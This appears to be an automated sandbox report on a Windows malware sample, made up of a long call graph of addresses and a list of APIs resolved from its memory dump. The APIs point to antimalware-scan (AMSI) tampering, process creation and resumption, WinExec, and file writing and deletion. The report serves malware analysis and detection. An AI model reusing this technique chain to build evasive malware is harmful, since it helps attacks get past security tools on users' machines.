call 2e447ec call 2e449a0 call 2e446d4 call 2e44860 call 2e449a0 call 2e446d4 call 2e447ec call 2e449a0 call 2e446d4 call 2e589d0 call 2e44860 call 2e449a0 call 2e446d4 call 2e447ec call 2e449a0 call 2e446d4 call 2e589d0 call 2e44860 call 2e449a0 call 2e446d4 call 2e447ec call 2e449a0 call 2e446d4 call 2e589d0 call 2e588b8 call 2e44860 call 2e449a0 call 2e446d4 call 2e447ec call 2e449a0 call 2e446d4 call 2e589d0 call 2e44860 call 2e449a0 call 2e446d4 call 2e447ec call 2e449a0 call 2e446d4 call 2e589d0 call 2e44860 call 2e449a0 call 2e446d4 call 2e447ec call 2e449a0 call 2e446d4 call 2e589d0 call 2e44860 call 2e449a0 call 2e446d4 call 2e447ec call 2e449a0 call 2e446d4 call 2e589d0 call 2e588b8 call 2e5e358 call 2e44de0 call 2e44764 call 2e44de0 call 2e5dc8c call 2e44860 call 2e449a0 call 2e446d4 call 2e447ec call 2e449a0 call 2e446d4 call 2e589d0 call 2e44860 call 2e449a0 call 2e446d4 call 2e447ec call 2e449a0 call 2e446d4 call 2e589d0 call 2e44860 call 2e449a0 call 2e446d4 call 2e447ec call 2e449a0 call 2e446d4 call 2e589d0 call 2e44860 call 2e449a0 call 2e446d4 call 2e447ec call 2e449a0 call 2e446d4 call 2e589d0 call 2e44860 call 2e449a0 call 2e446d4 call 2e447ec call 2e449a0 call 2e446d4 call 2e589d0 call 2e44860 call 2e449a0 call 2e446d4 call 2e447ec call 2e449a0 call 2e446d4 call 2e589d0 call 2e44860 call 2e449a0 call 2e446d4 call 2e447ec call 2e449a0 call 2e446d4 call 2e589d0 call 2e44860 call 2e449a0 call 2e446d4 call 2e447ec call 2e449a0 call 2e446d4 call 2e589d0 call 2e588b8 call 2e44860 call 2e449a0 call 2e446d4 call 2e447ec call 2e449a0 call 2e446d4 call 2e589d0 call 2e44860 call 2e449a0 call 2e446d4 call 2e447ec call 2e449a0 call 2e446d4 call 2e589d0 Sleep call 2e44860 call 2e449a0 call 2e446d4 call 2e447ec call 2e449a0 call 2e446d4 call 2e589d0 call 2e44860 call 2e449a0 call 2e446d4 call 2e447ec call 2e449a0 call 2e446d4 call 2e589d0 call 2e44860 call 2e449a0 call 2e446d4 call 2e447ec call 2e449a0 call 2e446d4 call 2e589d0 call 2e449a0 call 2e44d74 call 2e5dc04 call 2e449a0 call 2e44d74 call 2e5dc04 call 2e449a0 call 2e44d74 call 2e5dc04 call 2e449a0 call 2e44d74 call 2e5dc04 call 2e44860 call 2e449a0 call 2e446d4 call 2e447ec call 2e449a0 call 2e446d4 call 2e589d0 call 2e44860 call 2e449a0 call 2e446d4 call 2e447ec call 2e449a0 call 2e446d4 call 2e589d0 call 2e44860 call 2e449a0 call 2e446d4 call 2e447ec call 2e449a0 call 2e446d4 call 2e589d0 call 2e44860 call 2e449a0 call 2e446d4 call 2e447ec call 2e449a0 call 2e446d4 call 2e589d0 call 2e44d74 call 2e5dc04 call 2e44d74 call 2e5dc04 call 2e44d74 8425 2e65530-2e65b02 call 2e44860 call 2e449a0 call 2e446d4 call 2e447ec call 2e449a0 call 2e446d4 call 2e589d0 call 2e44860 call 2e449a0 call 2e446d4 call 2e447ec call 2e449a0 call 2e446d4 call 2e589d0 call 2e44860 call 2e449a0 call 2e446d4 call 2e447ec call 2e449a0 call 2e446d4 call 2e589d0 call 2e44860 call 2e449a0 call 2e446d4 call 2e447ec call 2e449a0 call 2e446d4 call 2e589d0 call 2e5e398 call 2e44530 call 2e44860 call 2e449a0 call 2e446d4 call 2e447ec call 2e449a0 call 2e446d4 call 2e589d0 call 2e44860 call 2e449a0 call 2e446d4 call 2e447ec call 2e449a0 call 2e446d4 call 2e589d0 call 2e47acc call 2e5f16c call 2e44530 call 2e44860 call 2e449a0 call 2e446d4 call 2e447ec call 2e449a0 call 2e446d4 call 2e589d0 call 2e44860 call 2e449a0 call 2e446d4 call 2e447ec call 2e449a0 call 2e446d4 call 2e589d0 call 2e44860 call 2e449a0 call 2e446d4 call 2e447ec call 2e449a0 call 2e446d4 call 2e589d0 call 2e44860 call 2e449a0 call 2e446d4 call 2e447ec call 2e449a0 call 2e446d4 call 2e589d0 call 2e5f094 call 2e5f108 call 2e44530 call 2e44860 call 2e449a0 call 2e446d4 call 2e447ec call 2e449a0 call 2e446d4 call 2e589d0 7740->8425 8426 2e6552b call 2e5dc04 7740->8426 8596 2e65b07-2e65d82 call 2e44860 call 2e449a0 call 2e446d4 call 2e447ec call 2e449a0 call 2e446d4 call 2e589d0 call 2e44860 call 2e449a0 call 2e446d4 call 2e447ec call 2e449a0 call 2e446d4 call 2e589d0 call 2e44860 call 2e449a0 call 2e446d4 call 2e447ec call 2e449a0 call 2e446d4 call 2e589d0 call 2e44860 call 2e449a0 call 2e446d4 call 2e447ec call 2e449a0 call 2e446d4 call 2e589d0 call 2e44860 call 2e449a0 call 2e446d4 call 2e447ec call 2e449a0 call 2e446d4 call 2e589d0 call 2e448ec 8425->8596 8426->8425 8669 2e67568-2e677e3 call 2e44860 call 2e449a0 call 2e446d4 call 2e447ec call 2e449a0 call 2e446d4 call 2e589d0 call 2e44860 call 2e449a0 call 2e446d4 call 2e447ec call 2e449a0 call 2e446d4 call 2e589d0 call 2e44860 call 2e449a0 call 2e446d4 call 2e447ec call 2e449a0 call 2e446d4 call 2e589d0 call 2e44860 call 2e449a0 call 2e446d4 call 2e447ec call 2e449a0 call 2e446d4 call 2e589d0 call 2e44860 call 2e449a0 call 2e446d4 call 2e447ec call 2e449a0 call 2e446d4 call 2e589d0 call 2e448ec 8596->8669 8670 2e65d88-2e65dcd call 2e44860 call 2e449a0 call 2e446d4 call 2e47e5c 8596->8670 8816 2e68318-2e68517 call 2e44860 call 2e449a0 call 2e446d4 call 2e447ec call 2e449a0 call 2e446d4 call 2e589d0 call 2e44860 call 2e449a0 call 2e446d4 call 2e447ec call 2e449a0 call 2e446d4 call 2e589d0 call 2e44860 call 2e449a0 call 2e446d4 call 2e447ec call 2e449a0 call 2e446d4 call 2e589d0 call 2e44860 call 2e449a0 call 2e446d4 call 2e447ec call 2e449a0 call 2e446d4 call 2e589d0 call 2e448ec 8669->8816 8817 2e677e9-2e67e3b call 2e44860 call 2e449a0 call 2e446d4 call 2e447ec call 2e449a0 call 2e446d4 call 2e589d0 call 2e44860 call 2e449a0 call 2e446d4 call 2e447ec call 2e449a0 call 2e446d4 call 2e589d0 call 2e44860 call 2e449a0 call 2e446d4 call 2e447ec call 2e449a0 call 2e446d4 call 2e589d0 call 2e447ec call 2e449a0 call 2e585bc call 2e44860 call 2e449a0 call 2e446d4 call 2e447ec call 2e449a0 call 2e446d4 call 2e589d0 call 2e44860 call 2e449a0 call 2e446d4 call 2e447ec call 2e449a0 call 2e446d4 call 2e589d0 call 2e44860 call 2e449a0 call 2e446d4 call 2e447ec call 2e449a0 call 2e446d4 call 2e589d0 call 2e449a0 call 2e446d4 call 2e5adf8 call 2e44860 call 2e449a0 call 2e446d4 call 2e447ec call 2e449a0 call 2e446d4 call 2e589d0 call 2e44860 call 2e449a0 call 2e446d4 call 2e447ec call 2e449a0 call 2e446d4 call 2e589d0 call 2e44860 call 2e449a0 call 2e446d4 call 2e447ec call 2e449a0 call 2e446d4 call 2e589d0 call 2e436d0 call 2e44860 call 2e449a0 call 2e446d4 call 2e447ec call 2e449a0 call 2e446d4 call 2e589d0 call 2e44860 call 2e449a0 call 2e446d4 call 2e447ec call 2e449a0 call 2e446d4 call 2e589d0 call 2e44860 call 2e449a0 call 2e446d4 call 2e447ec call 2e449a0 call 2e446d4 call 2e589d0 8669->8817 8670->8669 8687 2e65dd3-2e664db call 2e44860 call 2e449a0 call 2e446d4 call 2e447ec call 2e449a0 call 2e446d4 call 2e589d0 call 2e44860 call 2e449a0 call 2e446d4 call 2e447ec call 2e449a0 call 2e446d4 call 2e589d0 call 2e44860 call 2e449a0 call 2e446d4 call 2e447ec call 2e449a0 call 2e446d4 call 2e589d0 call 2e44860 call 2e449a0 call 2e446d4 call 2e44860 call 2e449a0 call 2e446d4 call 2e447ec call 2e449a0 call 2e446d4 call 2e589d0 call 2e44860 call 2e449a0 call 2e446d4 call 2e447ec call 2e449a0 call 2e446d4 call 2e589d0 call 2e44860 call 2e449a0 call 2e446d4 call 2e447ec call 2e449a0 call 2e446d4 call 2e589d0 call 2e44860 call 2e449a0 call 2e446d4 call 2e447ec call 2e449a0 call 2e446d4 call 2e589d0 call 2e44860 call 2e449a0 call 2e446d4 call 2e44860 call 2e449a0 call 2e446d4 call 2e447ec call 2e449a0 call 2e446d4 call 2e589d0 call 2e44860 call 2e449a0 call 2e446d4 call 2e447ec call 2e449a0 call 2e446d4 call 2e589d0 call 2e44860 call 2e449a0 call 2e446d4 call 2e447ec call 2e449a0 call 2e446d4 call 2e589d0 call 2e44860 call 2e449a0 call 2e446d4 call 2e447ec call 2e449a0 call 2e446d4 call 2e589d0 call 2e44860 call 2e449a0 call 2e446d4 call 2e447ec call 2e449a0 call 2e446d4 call 2e589d0 call 2e44860 call 2e449a0 call 2e446d4 call 2e447ec call 2e449a0 call 2e446d4 call 2e589d0 call 2e44860 call 2e449a0 8670->8687 9337 2e664e0-2e664e1 call 2e585bc 8687->9337 8992 2e693a1-2e69524 call 2e44860 call 2e449a0 call 2e446d4 call 2e447ec call 2e449a0 call 2e446d4 call 2e589d0 call 2e44860 call 2e449a0 call 2e446d4 call 2e447ec call 2e449a0 call 2e446d4 call 2e589d0 call 2e44860 call 2e449a0 call 2e446d4 call 2e447ec call 2e449a0 call 2e446d4 call 2e589d0 call 2e448ec 8816->8992 8993 2e6851d-2e686f0 call 2e44860 call 2e449a0 call 2e446d4 call 2e447ec call 2e449a0 call 2e446d4 call 2e589d0 call 2e44860 call 2e449a0 call 2e446d4 call 2e447ec call 2e449a0 call 2e446d4 call 2e589d0 call 2e44860 call 2e449a0 call 2e446d4 call 2e447ec call 2e449a0 call 2e446d4 call 2e589d0 call 2e447ec call 2e449a0 call 2e44d74 call 2e44df0 CreateProcessAsUserW 8816->8993 9582 2e67e42-2e68104 call 2e55aec call 2e44bcc call 2e44860 call 2e449a0 call 2e446d4 call 2e447ec call 2e449a0 call 2e446d4 call 2e589d0 call 2e449f8 call 2e57e50 call 2e44860 call 2e449a0 call 2e446d4 call 2e447ec call 2e449a0 call 2e446d4 call 2e589d0 call 2e44860 call 2e449a0 call 2e446d4 call 2e447ec call 2e449a0 call 2e446d4 call 2e589d0 call 2e44860 call 2e449a0 call 2e446d4 call 2e447ec call 2e449a0 call 2e446d4 call 2e589d0 call 2e44860 call 2e449a0 call 2e446d4 call 2e447ec call 2e449a0 call 2e446d4 call 2e589d0 call 2e5b118 8817->9582 9583 2e67e3d-2e67e40 8817->9583 9175 2e69cf5-2e69d60 call 2e44860 call 2e449a0 call 2e446d4 call 2e447ec call 2e449a0 call 2e446d4 8992->9175 9176 2e6952a-2e69539 call 2e448ec 8992->9176 9205 2e686f2-2e68769 call 2e44860 call 2e449a0 call 2e446d4 call 2e447ec call 2e449a0 call 2e446d4 call 2e589d0 8993->9205 9206 2e6876e-2e68879 call 2e44860 call 2e449a0 call 2e446d4 call 2e447ec call 2e449a0 call 2e446d4 call 2e589d0 call 2e44860 call 2e449a0 call 2e446d4 call 2e447ec call 2e449a0 call 2e446d4 call 2e589d0 8993->9206 9240 2e69d65-2e69d6c call 2e589d0 9175->9240 9176->9175 9187 2e6953f-2e69812 call 2e44860 call 2e449a0 call 2e446d4 call 2e447ec call 2e449a0 call 2e446d4 call 2e589d0 call 2e44860 call 2e449a0 call 2e446d4 call 2e447ec call 2e449a0 call 2e446d4 call 2e589d0 call 2e44860 call 2e449a0 call 2e446d4 call 2e447ec call 2e449a0 call 2e446d4 call 2e589d0 call 2e5f094 call 2e44860 call 2e449a0 call 2e446d4 call 2e44860 call 2e449a0 call 2e446d4 call 2e447ec call 2e449a0 call 2e446d4 call 2e589d0 call 2e44860 call 2e449a0 call 2e446d4 call 2e447ec call 2e449a0 call 2e446d4 call 2e589d0 call 2e47e5c 9176->9187 9607 2e69aef-2e69b5a call 2e44860 call 2e449a0 call 2e446d4 call 2e447ec call 2e449a0 call 2e446d4 9187->9607 9608 2e69818-2e69ade call 2e44860 call 2e449a0 call 2e446d4 call 2e447ec call 2e449a0 call 2e446d4 call 2e589d0 call 2e44860 call 2e449a0 call 2e446d4 call 2e447ec call 2e449a0 call 2e446d4 call 2e589d0 call 2e44860 call 2e449a0 call 2e446d4 call 2e447ec call 2e449a0 call 2e446d4 call 2e589d0 call 2e5e358 call 2e44530 call 2e44860 call 2e449a0 call 2e446d4 call 2e447ec call 2e449a0 call 2e446d4 call 2e589d0 call 2e44860 call 2e449a0 call 2e446d4 call 2e447ec call 2e449a0 call 2e446d4 call 2e589d0 call 2e44de0 * 2 call 2e44764 9187->9608 9205->9206 9363 2e68880-2e68ba0 call 2e449f8 call 2e5de50 call 2e44860 call 2e449a0 call 2e446d4 call 2e447ec call 2e449a0 call 2e446d4 call 2e589d0 call 2e44860 call 2e449a0 call 2e446d4 call 2e447ec call 2e449a0 call 2e446d4 call 2e589d0 call 2e44860 call 2e449a0 call 2e446d4 call 2e447ec call 2e449a0 call 2e446d4 call 2e589d0 call 2e5d164 call 2e44860 call 2e449a0 call 2e446d4 call 2e447ec call 2e449a0 call 2e446d4 call 2e589d0 call 2e44860 call 2e449a0 call 2e446d4 call 2e447ec call 2e449a0 call 2e446d4 call 2e589d0 call 2e44860 call 2e449a0 call 2e446d4 call 2e447ec call 2e449a0 call 2e446d4 call 2e589d0 9206->9363 9364 2e6887b-2e6887e 9206->9364 9253 2e69d71-2e69e8b call 2e44860 call 2e449a0 call 2e446d4 call 2e447ec call 2e449a0 call 2e446d4 call 2e589d0 call 2e44860 call 2e449a0 call 2e446d4 call 2e447ec call 2e449a0 call 2e446d4 call 2e589d0 call 2e446d4 * 2 9240->9253 9420 2e69e90-2e69e97 call 2e589d0 9253->9420 9347 2e664e6-2e66551 call 2e44860 call 2e449a0 call 2e446d4 call 2e447ec call 2e449a0 call 2e446d4 9337->9347 9407 2e66556-2e6655d call 2e589d0 9347->9407 9899 2e68ba2-2e68bb4 call 2e58730 9363->9899 9900 2e68bb9-2e692c0 call 2e44860 call 2e449a0 call 2e446d4 call 2e447ec call 2e449a0 call 2e446d4 call 2e589d0 call 2e44860 call 2e449a0 call 2e446d4 call 2e447ec call 2e449a0 call 2e446d4 call 2e589d0 call 2e44860 call 2e449a0 call 2e446d4 call 2e447ec call 2e449a0 call 2e446d4 call 2e589d0 ResumeThread call 2e44860 call 2e449a0 call 2e446d4 call 2e447ec call 2e449a0 call 2e446d4 call 2e589d0 call 2e44860 call 2e449a0 call 2e446d4 call 2e447ec call 2e449a0 call 2e446d4 call 2e589d0 call 2e44860 call 2e449a0 call 2e446d4 call 2e447ec call 2e449a0 call 2e446d4 call 2e589d0 CloseHandle call 2e44860 call 2e449a0 call 2e446d4 call 2e447ec call 2e449a0 call 2e446d4 call 2e589d0 call 2e44860 call 2e449a0 call 2e446d4 call 2e447ec call 2e449a0 call 2e446d4 call 2e589d0 call 2e44860 call 2e449a0 call 2e446d4 call 2e447ec call 2e449a0 call 2e446d4 call 2e589d0 call 2e44860 call 2e449a0 call 2e446d4 call 2e447ec call 2e449a0 call 2e446d4 call 2e589d0 call 2e44860 call 2e449a0 call 2e446d4 call 2e447ec call 2e449a0 call 2e446d4 call 2e589d0 call 2e44860 call 2e449a0 call 2e446d4 call 2e447ec call 2e449a0 call 2e446d4 call 2e589d0 call 2e44860 call 2e449a0 call 2e446d4 call 2e447ec call 2e449a0 call 2e446d4 call 2e589d0 call 2e58080 call 2e5894c * 6 CloseHandle 9363->9900 9364->9363 9418 2e66562-2e666e5 call 2e44860 call 2e449a0 call 2e446d4 call 2e447ec call 2e449a0 call 2e446d4 call 2e589d0 call 2e44860 call 2e449a0 call 2e446d4 call 2e447ec call 2e449a0 call 2e446d4 call 2e589d0 call 2e44860 call 2e449a0 call 2e446d4 call 2e447ec call 2e449a0 call 2e446d4 call 2e589d0 call 2e448ec 9407->9418 9649 2e666eb-2e66938 call 2e44860 call 2e449a0 call 2e446d4 call 2e447ec call 2e449a0 call 2e446d4 call 2e589d0 call 2e44860 call 2e449a0 call 2e446d4 call 2e447ec call 2e449a0 call 2e446d4 call 2e589d0 call 2e44860 call 2e449a0 call 2e446d4 call 2e447ec call 2e449a0 call 2e446d4 call 2e589d0 call 2e44860 call 2e449a0 call 2e446d4 call 2e447ec call 2e449a0 call 2e446d4 call 2e589d0 call 2e44860 call 2e449a0 call 2e44d74 call 2e44de0 call 2e44764 9418->9649 9650 2e66949-2e669b4 call 2e44860 call 2e449a0 call 2e446d4 call 2e447ec call 2e449a0 call 2e446d4 9418->9650 9431 2e69e9c-2e69ebe call 2e446d4 * 2 9420->9431 9448 2e69ec3-2e69eca call 2e589d0 9431->9448 9459 2e69ecf-2e69ef1 call 2e446d4 * 2 9448->9459 9479 2e69ef6-2e69efd call 2e589d0 9459->9479 9489 2e69f02-2e69f24 call 2e446d4 * 2 9479->9489 9511 2e69f29-2e69f30 call 2e589d0 9489->9511 9517 2e69f35-2e69fa0 call 2e44860 call 2e449a0 call 2e446d4 call 2e447ec call 2e449a0 call 2e446d4 9511->9517 9580 2e69fa5-2e69fac call 2e589d0 9517->9580 9592 2e69fb1-2e6a0cb call 2e44860 call 2e449a0 call 2e446d4 call 2e447ec call 2e449a0 call 2e446d4 call 2e589d0 call 2e44860 call 2e449a0 call 2e446d4 call 2e447ec call 2e449a0 call 2e446d4 call 2e589d0 call 2e446d4 * 2 9580->9592 10135 2e68109-2e68120 call 2e43700 9582->10135 9583->9582 9801 2e6a0d0-2e6a0d7 call 2e589d0 9592->9801 9689 2e69b5f-2e69b66 call 2e589d0 9607->9689 10136 2e69ae3-2e69aea call 2e5dc8c 9608->10136 10100 2e6693d-2e66944 call 2e5dc8c 9649->10100 9734 2e669b9-2e669c0 call 2e589d0 9650->9734 9699 2e69b6b-2e69ce4 call 2e44860 call 2e449a0 call 2e446d4 call 2e447ec call 2e449a0 call 2e446d4 call 2e589d0 call 2e44860 call 2e449a0 call 2e446d4 call 2e447ec call 2e449a0 call 2e446d4 call 2e589d0 call 2e44860 call 2e449a0 call 2e446d4 call 2e447ec call 2e449a0 call 2e446d4 call 2e589d0 call 2e449f8 9689->9699 10012 2e69ce9-2e69cf0 call 2e58d70 9699->10012 9748 2e669c5-2e67040 call 2e44860 call 2e449a0 call 2e446d4 call 2e447ec call 2e449a0 call 2e446d4 call 2e589d0 call 2e44860 call 2e449a0 call 2e446d4 call 2e447ec call 2e449a0 call 2e446d4 call 2e589d0 call 2e44860 call 2e449a0 call 2e446d4 call 2e447ec call 2e449a0 call 2e446d4 call 2e589d0 call 2e44860 call 2e449a0 call 2e446d4 call 2e447ec call 2e449a0 call 2e446d4 call 2e589d0 call 2e44860 call 2e449a0 call 2e446d4 call 2e447ec call 2e449a0 call 2e446d4 call 2e589d0 call 2e44860 call 2e449a0 call 2e446d4 call 2e447ec call 2e449a0 call 2e446d4 call 2e589d0 call 2e436d0 call 2e44860 call 2e449a0 call 2e446d4 call 2e447ec call 2e449a0 call 2e446d4 call 2e589d0 call 2e44860 call 2e42f08 call 2e47990 call 2e447ec call 2e44860 call 2e449a0 call 2e446d4 call 2e447ec call 2e449a0 call 2e446d4 call 2e589d0 call 2e44860 call 2e449a0 call 2e446d4 call 2e447ec call 2e449a0 call 2e446d4 call 2e589d0 call 2e42f08 call 2e47990 call 2e447ec call 2e44860 call 2e449a0 call 2e446d4 call 2e447ec call 2e449a0 call 2e446d4 call 2e589d0 call 2e44860 call 2e449a0 call 2e446d4 call 2e447ec call 2e449a0 call 2e446d4 call 2e589d0 call 2e44860 call 2e449a0 call 2e446d4 9734->9748 10512 2e67045-2e67052 call 2e54dd4 9748->10512 9811 2e6a0dc-2e6a0fe call 2e446d4 * 2 9801->9811 9841 2e6a103-2e6a10a call 2e589d0 9811->9841 9855 2e6a10f-2e6a164 call 2e446d4 * 2 call 2e589d0 call 2e446d4 * 2 9841->9855 9925 2e6a169-2e6a170 call 2e589d0 9855->9925 9899->9900 10586 2e692c5-2e6939c call 2e44860 call 2e449a0 call 2e446d4 call 2e447ec call 2e449a0 call 2e446d4 call 2e589d0 call 2e44860 call 2e449a0 call 2e446d4 call 2e447ec call 2e449a0 call 2e446d4 call 2e589d0 9900->10586 9940 2e6a175-2e6a197 call 2e446d4 * 2 9925->9940 9969 2e6a19c-2e6a1a3 call 2e589d0 9940->9969 9983 2e6a1a8-2e6a213 call 2e44860 call 2e449a0 call 2e446d4 call 2e447ec call 2e449a0 call 2e446d4 9969->9983 10060 2e6a218-2e6a21f call 2e589d0 9983->10060 10012->9175 10072 2e6a224-2e6a469 call 2e44860 call 2e449a0 call 2e446d4 call 2e447ec call 2e449a0 call 2e446d4 call 2e589d0 call 2e446d4 * 2 call 2e589d0 call 2e44860 call 2e449a0 call 2e446d4 call 2e447ec call 2e449a0 call 2e446d4 call 2e589d0 call 2e44860 call 2e449a0 call 2e446d4 call 2e447ec call 2e449a0 call 2e446d4 call 2e589d0 call 2e44860 call 2e449a0 call 2e446d4 call 2e447ec call 2e449a0 call 2e446d4 call 2e589d0 call 2e446d4 * 2 10060->10072 10301 2e6a46e-2e6a475 call 2e589d0 10072->10301 10100->9650 10136->9607 10307 2e6a47a-2e6a49c call 2e446d4 * 2 10301->10307 10320 2e6a4a1-2e6a4a8 call 2e589d0 10307->10320 10325 2e6a4ad-2e6a4cf call 2e446d4 * 2 10320->10325 10337 2e6a4d4-2e6a4db call 2e589d0 10325->10337 10343 2e6a4e0-2e6a502 call 2e446d4 * 2 10337->10343 10355 2e6a507-2e6a50e call 2e589d0 10343->10355 10362 2e6a513-2e6a9ad call 2e44860 call 2e449a0 call 2e446d4 call 2e447ec call 2e449a0 call 2e446d4 call 2e589d0 call 2e44860 call 2e449a0 call 2e446d4 call 2e447ec call 2e449a0 call 2e446d4 call 2e589d0 call 2e446d4 * 2 call 2e589d0 call 2e446d4 * 2 call 2e589d0 call 2e446d4 * 2 call 2e589d0 call 2e446d4 * 2 call 2e589d0 call 2e446d4 * 2 call 2e589d0 call 2e44860 call 2e449a0 call 2e446d4 call 2e447ec call 2e449a0 call 2e446d4 call 2e589d0 call 2e44860 call 2e449a0 call 2e446d4 call 2e447ec call 2e449a0 call 2e446d4 call 2e589d0 call 2e44860 call 2e449a0 call 2e446d4 call 2e447ec call 2e449a0 call 2e446d4 call 2e589d0 call 2e44860 call 2e449a0 call 2e446d4 call 2e447ec call 2e449a0 call 2e446d4 call 2e589d0 call 2e44860 call 2e449a0 call 2e446d4 call 2e447ec call 2e449a0 call 2e446d4 call 2e589d0 * 5 10355->10362 10663 2e6a9b2-2e6aa07 call 2e589d0 * 6 10362->10663 10517 2e67055-2e6706c call 2e43700 10512->10517 10586->8992 10675 2e6aa0c-2e6aa16 call 2e589d0 10663->10675 10677 2e6aa1b-2e6aa43 call 2e589d0 * 3 10675->10677 10683 2e6aa48-2e6ae01 call 2e589d0 call 2e44860 call 2e449a0 call 2e446d4 call 2e447ec call 2e449a0 call 2e446d4 call 2e589d0 call 2e446d4 * 2 call 2e589d0 call 2e446d4 * 2 call 2e589d0 call 2e446d4 * 2 call 2e589d0 call 2e446d4 * 2 call 2e589d0 call 2e446d4 * 2 call 2e589d0 call 2e446d4 * 2 call 2e589d0 call 2e446d4 * 2 call 2e589d0 call 2e44860 call 2e449a0 call 2e446d4 call 2e447ec call 2e449a0 call 2e446d4 call 2e589d0 call 2e44860 call 2e449a0 call 2e446d4 call 2e447ec call 2e449a0 call 2e446d4 call 2e589d0 call 2e44860 call 2e449a0 call 2e446d4 call 2e447ec call 2e449a0 call 2e446d4 call 2e589d0 call 2e446d4 * 2 call 2e589d0 call 2e446d4 * 2 10677->10683 10793 2e6ae06-2e6ae0d call 2e589d0 10683->10793 10795 2e6ae12-2e6ae34 call 2e446d4 * 2 10793->10795 10799 2e6ae39-2e6ae40 call 2e589d0 10795->10799 10801 2e6ae45-2e6ae67 call 2e446d4 * 2 10799->10801 10805 2e6ae6c-2e6ae73 call 2e589d0 10801->10805 10807 2e6ae78-2e6ae9a call 2e446d4 * 2 10805->10807 10811 2e6ae9f-2e6aea6 call 2e589d0 10807->10811 10813 2e6aeab-2e6b2f3 call 2e446d4 * 2 call 2e589d0 call 2e446d4 * 2 call 2e589d0 call 2e446d4 * 2 call 2e589d0 call 2e446d4 * 2 call 2e589d0 call 2e446d4 * 2 call 2e589d0 call 2e446d4 * 2 call 2e589d0 call 2e446d4 * 2 call 2e589d0 call 2e446d4 * 2 call 2e589d0 call 2e446d4 * 2 call 2e589d0 call 2e446d4 * 2 call 2e589d0 call 2e446d4 * 2 call 2e589d0 call 2e446d4 * 2 call 2e589d0 call 2e446d4 * 2 call 2e589d0 call 2e446d4 * 2 call 2e589d0 call 2e57c10 call 2e58338 call 2e44860 call 2e449a0 call 2e446d4 call 2e447ec call 2e449a0 call 2e446d4 call 2e589d0 call 2e44860 call 2e449a0 call 2e446d4 call 2e447ec call 2e449a0 call 2e446d4 call 2e589d0 call 2e44860 call 2e449a0 call 2e446d4 call 2e447ec call 2e449a0 call 2e446d4 call 2e589d0 10811->10813 10943 2e6b2f8-2e6b2fa ExitProcess 10813->10943
                                                                                                              APIs
                                                                                                                • Part of subcall function 02E589D0: FreeLibrary.KERNEL32(743E0000,00000000,00000000,00000000,00000000,02EC738C,Function_0000662C,00000004,02EC739C,02EC738C,05F5E103,00000040,02EC73A0,743E0000,00000000,00000000), ref: 02E58AAA
                                                                                                                • Part of subcall function 02E5DC8C: RtlDosPathNameToNtPathName_U.N(00000000,?,00000000,00000000,00000000,02E5DD5E), ref: 02E5DCCB
                                                                                                                • Part of subcall function 02E5DC8C: NtCreateFile.N(?,00100002,?,?,00000000,00000000,00000001,00000002,00000020,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 02E5DD05
                                                                                                                • Part of subcall function 02E5DC8C: NtWriteFile.N(?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,00100002,?,?,00000000,00000000,00000001), ref: 02E5DD32
                                                                                                                • Part of subcall function 02E5DC8C: NtClose.N(?,?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,00100002,?,?,00000000,00000000), ref: 02E5DD3B
                                                                                                              • Sleep.KERNEL32(000003E8,ScanBuffer,02EC7380,02E6B7B8,UacScan,02EC7380,02E6B7B8,ScanString,02EC7380,02E6B7B8,02E6BB30,00000000,00000000,02E6BB24,00000000,00000000), ref: 02E640CB
                                                                                                                • Part of subcall function 02E588B8: LoadLibraryW.KERNEL32(amsi), ref: 02E588C1
                                                                                                                • Part of subcall function 02E588B8: FreeLibrary.KERNEL32(00000000,00000000,?,?,00000006,?,?,000003E7,00000040,?,00000000,DllGetClassObject), ref: 02E58920
                                                                                                              • Sleep.KERNEL32(000003E8,ScanBuffer,02EC7380,02E6B7B8,OpenSession,02EC7380,02E6B7B8,UacScan,02EC7380,02E6B7B8,000003E8,ScanBuffer,02EC7380,02E6B7B8,UacScan,02EC7380), ref: 02E64277
                                                                                                                • Part of subcall function 02E5894C: LoadLibraryW.KERNEL32(bcrypt,?,000008A0,00000000,02EC73A8,02E5A587,ScanString,02EC73A8,02E5A93C,ScanBuffer,02EC73A8,02E5A93C,Initialize,02EC73A8,02E5A93C,UacScan), ref: 02E58960
                                                                                                                • Part of subcall function 02E5894C: GetProcAddress.KERNEL32(00000000,BCryptVerifySignature), ref: 02E5897A
                                                                                                                • Part of subcall function 02E5894C: FreeLibrary.KERNEL32(00000000,00000000,BCryptVerifySignature,bcrypt,?,000008A0,00000000,02EC73A8,02E5A587,ScanString,02EC73A8,02E5A93C,ScanBuffer,02EC73A8,02E5A93C,Initialize), ref: 02E589B6
                                                                                                              • Sleep.KERNEL32(00004E20,UacScan,02EC7380,02E6B7B8,ScanString,02EC7380,02E6B7B8,ScanBuffer,02EC7380,02E6B7B8,OpenSession,02EC7380,02E6B7B8,UacInitialize,02EC7380,02E6B7B8), ref: 02E650EE
                                                                                                                • Part of subcall function 02E5DC04: RtlI.N(?,?,00000000,02E5DC7E), ref: 02E5DC2C
                                                                                                                • Part of subcall function 02E5DC04: RtlDosPathNameToNtPathName_U.N(00000000,?,00000000,00000000,?,?,00000000,02E5DC7E), ref: 02E5DC42
                                                                                                                • Part of subcall function 02E5DC04: NtDeleteFile.N(?,00000000,?,00000000,00000000,?,?,00000000,02E5DC7E), ref: 02E5DC61
                                                                                                                • Part of subcall function 02E47E5C: GetFileAttributesA.KERNEL32(00000000,?,02E6041F,ScanString,02EC7380,02E6B7B8,OpenSession,02EC7380,02E6B7B8,ScanString,02EC7380,02E6B7B8,UacScan,02EC7380,02E6B7B8,UacInitialize), ref: 02E47E67
                                                                                                                • Part of subcall function 02E585BC: WinExec.KERNEL32(?,?), ref: 02E58624
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.1478003317.0000000002E41000.00000020.00001000.00020000.00000000.sdmp, Offset: 02E40000, based on PE: true
                                                                                                              • Associated: 00000004.00000002.1477966534.0000000002E40000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1478188879.0000000002E6E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1479661904.0000000002EC7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1479661904.0000000002FBB000.00000040.00001000.00020000.00000000.sdmpDownload File
